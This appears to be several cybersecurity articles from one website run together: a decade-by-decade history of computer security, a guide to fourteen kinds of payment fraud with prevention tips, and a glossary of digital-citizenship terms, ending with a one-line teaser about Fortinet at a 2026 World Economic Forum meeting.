By understanding these early foundations, we can appreciate how a field born in the realm of theory has become the frontline of global stability.
The 1950s: Mainframes, Physical Security, and Phone Phreaking
Governments, universities, and major businesses started using large, centralized machines known as mainframes. As these computers grew more powerful, the definition of "security" still remained grounded in the physical world. During this era, data protection simply meant controlling access to the room where the hardware sat. However, a new kind of technical subculture was beginning to emerge on the fringes of the telecommunications industry.
The 1950s saw the rise of phone phreaking, where enthusiasts exploited telephone signaling frequencies to make unauthorized long-distance calls. While not yet digital hacking, this movement introduced the concept of manipulating infrastructure for unintended purposes. This culture of curiosity and boundary-pushing would eventually produce industry titans; notably, both Steve Jobs and Steve Wozniak experimented with phreaking technology before the birth of Apple.
Key Characteristics of This Era:
Physical Perimeter: Security was defined by locks and restricted personnel access.
Phone Phreaking: The first widespread exploitation of a technological network.
Nascent Authentication: Password-based systems began to appear in informal, non-standardized forms.
Fragmented Protocols: Without a connected internet, every institution developed its own isolated security rules.
These early exploits proved that even the most robust physical defenses could be bypassed by those who understood the hidden language of the systems within.
The 1960s: The First Hackers and Growing Vulnerabilities
While known primarily for its social shifts, the 1960s also marked the birth of "hacking" as a technical practice. As computers became more prevalent in universities and large institutions, a new generation of users began exploring the limits of these systems. This era shifted the focus from purely physical security to the inherent vulnerabilities within the software itself.
In 1967, IBM invited students to test a new system, only to be surprised that their probing caused system crashes and revealed weaknesses. This informal "penetration test" proved that any system accessible to users was inherently open to exploitation. It was a wake-up call that sparked the transition of cybersecurity from a passive state to an active, intellectual discipline.
Key Characteristics of This Era:
Intentional Probing: The birth of deliberate vulnerability testing and "white hat" exploration.
Curiosity-Driven Hacking: Hacking emerged as a way to explore system boundaries, generally motivated by academic interest rather than malice.
Access vs. Security: Institutions realized that providing user access created inevitable security risks.
Beyond the Lock: The realization that cybersecurity required ongoing digital strategy, not just physical barriers.
This decade transformed the computer from a mysterious black box into a challenge to be solved, proving that human ingenuity would always be the greatest threat - and defense - to any system.
The 1970s transformed cybersecurity from a localized concern into a networked reality. The launch of ARPANET, the precursor to the modern internet, enabled researchers to share resources across distances but also opened a doorway for autonomous software to travel between systems.
In 1971, this potential was realized with Creeper, the world's first self-replicating network program. While harmless, its ability to move across the network and display messages was a revolutionary proof of concept. In response, programmer Ray Tomlinson created Reaper - the first antivirus program - specifically designed to hunt and delete Creeper. This decade also saw the rise of Kevin Mitnick, whose exploits in the 1980s showed that psychological manipulation, or social engineering, could bypass even the strongest technical barriers.
Key Characteristics of This Era:
Network Connectivity: ARPANET's birth created the first interconnected digital landscape.
The First Worm: Creeper demonstrated that programs could self-propagate autonomously.
The First Antivirus: Reaper established the "detect and delete" model of digital defense.
Social Engineering: Early hacks highlighted that human error is often the weakest link in the security chain.
This era proved that once computers started talking to each other, the "locked door" was no longer enough to keep an intruder out.
The 1980s: Personal Computers and the Birth of an Industry
The 1980s shifted computing from sterile labs to homes and offices. This explosion of connectivity via modems and floppy disks turned theoretical threats into a global reality, giving rise to the first commercial antivirus software and formal incident response teams like CERT.
Key Characteristics of This Era:
Wild Malware: Viruses like Elk Cloner and the Brain Virus moved beyond labs to infect personal computers worldwide.
The Morris Worm (1988): The first major network-wide disruption, leading to the first conviction under the Computer Fraud and Abuse Act (Robert Tappan Morris).
Cyber Espionage: Marcus Hess's breach of military systems for Soviet intelligence proved that digital networks had massive geopolitical stakes.
Ransomware Roots: The AIDS Trojan introduced the world to the concept of holding digital files hostage for payment.
The 1980s proved that as computers became personal, the threats against them became universal.
The 1990s: The Public Internet and Exploding Threats
As the World Wide Web went mainstream, the attack surface grew exponentially. This was the era of the "Macro Virus," where malicious code hid in everyday documents, and the dominance of Windows made it a universal target for hackers.
Key Characteristics of This Era:
Mass-Mailers: The Melissa virus demonstrated how email could be weaponized to clog global servers in hours.
The Encryption Standard: Netscape's SSL (1995) laid the foundation for secure online commerce and HTTPS.
Network Fortification: Firewalls became standard equipment as businesses scrambled to block external intrusions.
Legal Frameworks: Organizations like the EFF began fighting for digital privacy and standardized cybercrime laws.
This decade transformed cybersecurity services from a technical niche into a vital pillar of global commerce and law.
The 2000s: Professionalized Crime and Mature Defenses
The 2000s saw cybercrime scale into a high-profit industry. High-speed broadband and the rise of e-commerce meant that a single breach could compromise tens of millions of records, forcing the industry to develop more sophisticated authentication and monitoring tools.
Key Characteristics of This Era:
Massive DDoS Attacks: "Mafiaboy" proved that even giants like Amazon and eBay could be paralyzed by flooded traffic.
Social Engineering at Scale: The ILOVEYOU virus infected millions by exploiting human curiosity and trust.
Data Breach Epidemics: The TJX breach accelerated the adoption of strict data security standards like PCI DSS.
Encrypted Ransomware: In 2006, ransomware began using RSA encryption, making it nearly impossible to recover files without a key.
As attacks became more lucrative, the defensive industry responded with the first generation of modern security standards and behavioral analysis.
The 2010s shifted the focus from criminal profit to national security. Cybersecurity became a theater of war, with governments deploying digital weapons to destroy physical infrastructure and influence global politics.
Key Characteristics of This Era:
The Stuxnet Worm: The first acknowledged cyberweapon designed to cause physical destruction to industrial equipment.
The Snowden Leaks: Exposed the massive scale of global surveillance, sparking a decade-long debate on privacy.
Automation and AI: Machine learning began appearing on both sides - defenders used it for detection, while attackers used it to find flaws.
Global Ransomware: WannaCry and NotPetya showed how automated exploits could cripple hospitals and shipping lines across 150 countries.
By the end of the decade, it was clear that a line of code could be just as impactful as a physical weapon.
The 2020s: AI Threats and Modern Threat Intelligence
Today, the line between the physical and digital worlds has vanished. With remote work and cloud-native businesses, security is now a proactive game of "Threat Intelligence", which involves predicting and neutralizing an adversary's move before they even make it.
Key Characteristics of This Era:
Targeting Infrastructure: Attacks on power grids and water systems have raised the stakes from financial loss to public safety.
AI-Powered Attacks: Adversaries use AI to create deepfakes and hyper-personalized phishing at speeds humans can't match.
Predictive Defense: Modern strategy relies on Threat Intelligence, using AI to analyze patterns and stop attacks in their tracks.
Cloud & Remote Security: The shift away from traditional offices has forced a move toward "Zero Trust" security models.
The ongoing battle between human ingenuity and artificial intelligence now defines the frontlines of our digital existence.
Payment fraud is growing in scale and sophistication, affecting businesses across every industry, and as digital payments expand, so do the opportunities for bad actors to exploit vulnerabilities. Understanding how fraud works and how to prevent it is essential for protecting revenue, maintaining trust, and staying resilient in an increasingly complex threat landscape.
What Is Payment Fraud?
Payment fraud refers to the theft of money from businesses or individuals through unauthorized transactions or deceptive purchases. Fraudsters may act using their own accounts or by gaining unauthorized access to someone else's account.
While payment fraud can happen in person, online transactions are especially vulnerable. According to Juniper Research, global business losses from online payment fraud are projected to surpass $362 billion between 2023 and 2028. A business's fraud risk depends largely on its industry, the sensitivity of the data it handles, and the payment methods it accepts. The more ways customers can interact with accounts and complete purchases, the more entry points exist for bad actors to exploit.
Different Types of Payment Fraud
Fraudsters use many tactics, and below we list 14 of the most common. Given the large number of threats, businesses must prepare their teams to recognize a variety of warning signs. Strong internal communication policies, clear escalation procedures, and knowledge of the landscape are foundational to any fraud prevention strategy.
1. Phishing
Phishing is a social engineering tactic in which criminals attempt to trick people into revealing sensitive information such as account credentials or payment details. These attacks often come in the form of malicious links sent via email or text, but they can also occur over the phone. Attackers may pose as trusted figures - a friend, a bank representative, or a government official - to manipulate victims.
Prevention tips:
Let customers know exactly how your business will contact them, including phone numbers and email addresses.
Be transparent about what information your staff will and will not ask for.
Alert customers to any known phishing attempts targeting your brand.
Train employees on information security protocols and how to identify suspicious communications.
2. Credit and Debit Card Fraud
This type of fraud involves obtaining card information - either physically or digitally - and using it to make unauthorized purchases. Cards may be stolen directly, or details may be harvested through card skimming devices installed on ATMs or point-of-sale terminals. Attackers also acquire card data through phishing schemes or by purchasing stolen credentials on the dark web.
Prevention tips:
Restrict POS system access to authorized personnel and regularly inspect payment hardware for tampering.
Build secure, encrypted payment pages that comply with data protection standards.
Offer customers multiple notification options for purchases and account activity.
Warn customers never to share account or confirmation numbers with unverified sources.
3. Wire Transfer Fraud
In wire transfer fraud, criminals convince victims to send money directly to them. Because wire transfers are difficult to reverse, they are a preferred method among scammers. Attackers commonly impersonate someone the victim trusts - a family member, a company executive, or a business vendor. The use of a convincing back-story is often referred to as "social engineering." For example, an attacker may text employees pretending to be their CEO, claiming an emergency and requesting an urgent fund transfer.
Prevention tips:
Train employees to spot the signs of social engineering and impersonation.
Establish official communication channels and avoid conducting financial business over easily spoofed channels like text messages.
Report and share all phishing attempts with the entire team.
4. Check Fraud
Check fraud involves using counterfeit or altered checks to make payments or writing checks from accounts that lack sufficient funds. Fake checks may be digitally printed or modified versions of real checks. In some cases, the check is genuine but drawn from a closed account.
Prevention tips:
Implement software that verifies the authenticity of checks.
Train staff to recognize the visual and physical signs of fraudulent checks.
5. Chargeback and Refund Fraud
Also known as "friendly fraud," chargeback fraud occurs when a customer makes a legitimate purchase and then falsely claims a refund - either directly from the business or through their credit card company. This type of fraud is particularly tricky because it can be hard to distinguish from genuine disputes, especially when delivery or service quality is involved.
Prevention tips:
Validate customer information, including billing addresses and card security codes.
Use payment platforms that include fraud protection and dispute automation tools.
Respond to refund and chargeback requests quickly.
Minimize legitimate chargebacks by fulfilling orders accurately and on time.
6. Identity Theft
Identity theft happens when a criminal obtains someone's personal information and uses it for financial gain or to make purchases in someone else's name. For businesses, a common result is having to deal with chargebacks after customers discover fraudulent charges on their accounts. Although the primary victim is the customer, businesses have a responsibility to prevent data breaches that expose customer information in the first place.
Prevention tips:
Train employees to recognize phishing and follow secure information handling practices.
Ensure your payment systems comply with PCI DSS (Payment Card Industry Data Security Standard) requirements.
7. Account Takeover Fraud
Account takeover (ATO) fraud typically follows identity theft. Once attackers obtain a user's credentials, they change the password and contact information to lock the real owner out. From there, they may use the account for fraudulent purchases or sell it to other bad actors.
Prevention tips:
Enforce strong password requirements for all accounts.
Require two-factor authentication (2FA) and send confirmation alerts for any significant account changes.
Notify customers of purchases and account modifications in real time.
8. New Account Fraud
New account fraud (NAF) occurs when someone uses stolen or fabricated identities to open new lines of credit or accounts. These fraudulent accounts can then be used to make purchases or commit further fraud down the line.
Prevention tips:
Require multi-factor authentication (MFA) - not just email verification - during account creation.
Verify address details and card security information during transactions.
Use fraud protection tools that leverage machine learning to detect unusual account creation patterns.
9. Gift Card Fraud
Gift card fraud is a social engineering scam where criminals pressure victims into purchasing gift cards and handing over the card numbers. Once the numbers are given, the funds are essentially unrecoverable, making this a popular method among scammers.
Prevention tips:
Display warnings about gift card scams during the checkout process.
Remind customers never to share gift card numbers with people they don't personally know.
Educate in-store staff to recognize signs of gift card fraud and when to escalate the situation.
10. Merchant Identity Theft
In merchant identity theft, attackers impersonate legitimate businesses or vendors to defraud customers or partner organizations. They may use phishing to extract employee credentials and gain access to business systems, or they may pose as a trusted vendor and redirect payments to themselves.
Prevention tips:
Train staff to identify phishing attempts and follow secure communication practices.
Establish verification procedures when communicating with vendors and business partners.
Report phishing attempts to employees and partners promptly.
11. Pagejacking and Domain Spoofing
Pagejacking involves cloning an existing webpage and redirecting users to the fake version to steal login credentials or payment information. Domain spoofing follows a similar concept - attackers build an identical-looking site under a slightly different URL. Users are typically directed to these fraudulent pages through malicious emails or texts.
Prevention tips:
Run plagiarism detection tools to identify duplicate versions of your pages online.
Pay attention to unusual customer service complaints that might signal a spoofed site.
Submit takedown requests to search engines if you discover a duplicate site, and notify affected customers.
12. Mobile Payment Fraud
As mobile payments become more prevalent, they've also become a target for fraud. Attackers can exploit mobile apps through malware installation, stolen app credentials, or interception of 2FA codes. For example, a scammer may call a customer pretending to represent a business and ask them to read back a verification code - which is actually a 2FA code the attacker has triggered on the victim's account.
Prevention tips:
Authenticate customers over the phone carefully to reduce the risk of impersonation-based fraud.
Monitor for unusual spending or refund activity in mobile transactions.
Educate customers about the risks of clicking on unknown links, QR codes, or visiting unfamiliar websites.
13. Push Payment Fraud
Unlike unauthorized transaction fraud, push payment fraud involves tricking the victim into willingly sending money to a fraudster. This can take many forms, including phishing, blackmail, or deceptive scenarios like fake emergencies. The key distinction is that the victim actively initiates the transfer.
Prevention tips:
Clearly communicate to customers what your staff can and cannot ask them to do or pay.
Make it easy for customers to report anyone impersonating your business.
Issue proactive alerts about ongoing scam attempts tied to your brand.
14. ACH Payment Fraud
ACH (Automated Clearing House) payment fraud involves criminals gaining unauthorized access to a victim's bank account details and using them to initiate fraudulent transfers. For businesses, this risk can come from both outside attackers and malicious insiders.
Prevention tips:
Strictly limit and monitor employee access to business bank accounts.
Educate all staff with account access about phishing tactics and establish firm security policies.
Which Businesses Have the Highest Fraud Risk?
Not all businesses face the same level of exposure. Fraud risk is generally highest in sectors that process online payments, handle sensitive personal data, or still accept paper checks.
E-Commerce Businesses
E-Commerce businesses are particularly vulnerable. Online retail involves accepting payments from a wide range of locations, often with multiple payment methods. Features like peer-to-peer payment integrations or international checkout add more potential points of failure. The more accounts and payment methods a customer has linked, the more attractive a target they become for data breaches.
Healthcare, Banking, and Data-Sensitive Industries
These sectors are at elevated risk because of the high value of the information they store. A breach in these sectors doesn't just expose financial data - it can compromise identity information used to commit fraud across many platforms simultaneously.
Businesses Still Accepting Checks
These kinds of businesses face unique challenges. As check usage declines, employees may become less experienced at identifying fakes, which makes training and verification systems all the more important. According to the Association for Financial Professionals, check fraud remains one of the most common forms of payment fraud.
How to Mitigate Risk
A variety of tools and strategies are available to help businesses identify and reduce fraud exposure. Conducting a security risk assessment is a strong starting point, helping teams understand which vulnerabilities are most critical and where to prioritize investment.
From there, organizations should focus on establishing a solid operational and security foundation before layering in more advanced fraud detection capabilities.
Foundational Controls
These measures create a baseline level of protection by securing systems, safeguarding data, and reducing avoidable losses:
Strong network and password security: Establish internal policies governing account access, password requirements, and physical access to devices and systems.
Network tokenization: Ensure payment systems encrypt and tokenize customer data to protect sensitive information.
PCI standards compliance: Build payment workflows that meet Payment Card Industry (PCI) standards to safeguard cardholder data.
3D Secure (3DS) authentication: Use the latest 3DS protocols to validate transactions and verify user identity before completing purchases.
Chargeback protection: Work with your payment processor to implement tools that help minimize financial losses from disputed transactions.
Once these core protections are in place, businesses can enhance their fraud prevention strategies with more dynamic, data-driven approaches.
Advanced Detection & Optimization
These techniques improve visibility, adaptability, and long-term resilience against evolving fraud tactics:
Fraud KPI tracking: Monitor key metrics such as dispute rates, authorization rates, and approval/decline ratios to identify trends and respond proactively.
Rules-based systems: Implement rule-based detection as a reliable operational backbone. While rules require ongoing maintenance, they are especially useful in early stages and can be refined over time.
Machine learning algorithms: Leverage ML-powered systems to analyze large, complex datasets and uncover patterns that are difficult to detect manually. These models continuously improve as they adapt to new fraud behaviors.
Staying Ahead of Payment Fraud
Payment fraud is an ongoing challenge, but a proactive, layered approach can significantly reduce risk. By combining strong foundational controls with data-driven detection and continuous monitoring, businesses can stay ahead of evolving threats.
Ultimately, effective fraud prevention requires regular review, employee awareness, and a commitment to adapting as tactics change.
The internet is basically a giant digital city, and you need to be just as streetwise here as outside your front door. Most people go online every day - scrolling through TikTok, finishing a research paper, or making purchases - but they don't always know the "rules of the road" or the vocabulary that tech experts use to describe our digital lives. Here's a breakdown of essential digital citizenship terms to help you navigate the web and mobile apps like a pro:
Authority - Authority refers to how trustworthy a source is based on who created it. If information comes from a qualified expert or a well-known organization, it's more likely to be reliable than something posted by an unknown user.
Bystander - A bystander is someone who sees harmful behavior online, like cyberbullying, but chooses not to get involved or take action.
Cookies - Cookies are small files that websites store on your device to remember information about you, like login details or browsing habits. They make websites easier to use, but they also allow service providers to track your activity.
Cyberbullying - Cyberbullying is when someone uses digital platforms to repeatedly harass, threaten, or embarrass another person. Unlike trolling, it usually targets a specific individual.
Data Breach - A data breach happens when private or sensitive information is accessed or stolen without permission, often from companies or large platforms.
Digital Citizen - A digital citizen is anyone who uses technology to interact with others online. Being a good digital citizen means using the internet responsibly, respectfully, and safely.
Digital Footprint - A digital footprint is the trail of information you leave behind online through posts, searches, and interactions. The more you share, the greater your exposure to privacy issues or misuse of personal information. Also, once something is online, it can be very difficult to remove.
Digital Identity Theft - Digital identity theft occurs when someone steals your personal information, like passwords or account details, to pretend to be you or access your accounts.
Digital Divide - The digital divide refers to the gap between people who have access to modern technology and the internet and those who do not.
Encryption - Encryption is a method of protecting data by turning it into a coded format that only authorized users can read. It helps keep sensitive information secure.
Firewall - A firewall is a security system that monitors and controls incoming and outgoing network traffic, blocking anything that looks suspicious or harmful.
Imaginary Audience - The imaginary audience is the feeling that people are constantly watching and judging you. Social media can make this feeling stronger by showing likes, views, and comments.
Invisible Audience - The invisible audience refers to the unknown people who may see your online content, including strangers, future employers, or others outside your immediate circle. It pays to assess your security blind spots because you may not realize who is viewing your posts.
Malware - Malware is any type of harmful software designed to damage devices, steal information, or disrupt normal operations. It is often installed as part of a package or application that otherwise appears innocent.
Password Hygiene - Password hygiene refers to the practice of creating strong, unique passwords and keeping them secure instead of reusing the same one across multiple accounts.
Phishing - Phishing is a scam where attackers pretend to be a trusted source to trick you into giving away personal information, often through fake emails, texts, or websites.
Public Wi-Fi Risk - Public Wi-Fi risk refers to the potential dangers of using unsecured networks, where hackers may be able to intercept your data.
Reliability - Reliability refers to whether information is accurate and dependable. Just because something looks professional online doesn't mean it's true.
Social Comparison - Social comparison is the act of comparing your life to what you see online. Since people often share only their best moments, it can create unrealistic expectations.
Targeted Advertising - Targeted advertising uses your online behavior, location, and personal data to show ads that are specifically tailored to you.
Trolling - Trolling is when someone posts deliberately annoying or provocative content online to get attention or start arguments.
Two-Factor Authentication (2FA) - Two-factor authentication is a security feature that requires a second form of verification, like a code sent to your phone, in addition to your password.
Upstander - An upstander is someone who takes action when they see harmful behavior online, such as supporting the victim or reporting the issue.
VPN (Virtual Private Network) - A VPN is a tool that creates a secure, encrypted connection to the internet, helping protect your data and privacy, especially on public networks.
Key takeaways from Fortinetβs participation at the World Economic Forum Annual Meeting on Cybersecurity 2026 on AI-driven threats, deepfakes, and the future of cyber defense.